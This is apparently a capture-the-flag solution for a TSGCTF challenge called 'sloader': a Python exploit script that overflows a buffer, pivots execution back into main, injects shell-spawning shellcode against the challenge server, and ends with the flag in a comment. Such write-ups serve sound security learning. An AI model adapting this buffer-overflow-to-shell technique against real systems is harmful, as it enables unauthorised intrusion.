Rating:
```python
#!/usr/bin/env python3
from sc_expwn import * # https://raw.githubusercontent.com/shift-crops/sc_expwn/master/sc_expwn.py
ld_file = './sloader'
bin_file = './chall'
context(os = 'linux', arch = 'amd64')
# context.log_level = 'debug'
#==========
env = Environment('debug', 'local', 'remote')
env.set_item('mode', debug = 'DEBUG', local = 'PROC', remote = 'SOCKET')
env.set_item('target', debug = {'argv':[ld_file, bin_file], 'aslr':False, 'gdbscript':''}, \
local = {'argv':[ld_file, bin_file]}, \
remote = {'host':'34.146.195.242', 'port':40001})
env.select()
#==========
binf = ELF(bin_file)
binf.address = 0x01400000
addr_main = binf.sep_function['main']
addr_buf = binf.address + 0x1f00
#==========
def attack(conn, **kwargs):
exploit = b'a'*0x20
exploit += p64(addr_buf)
exploit += p64(addr_main + 0x1b)
conn.sendline(exploit)
exploit = b'b'*0x20
exploit += p64(0xdeadbeef)
exploit += p64(addr_buf + 0x10)
exploit += asm(shellcraft.sh())
conn.sendline(exploit)
#==========
def main():
comn = Communicate(env.mode, **env.target)
comn.connect()
comn.run(attack)
comn.interactive()
# TSGCTF{sload_your_way_to_glory}
if __name__=='__main__':
main()
#==========
```
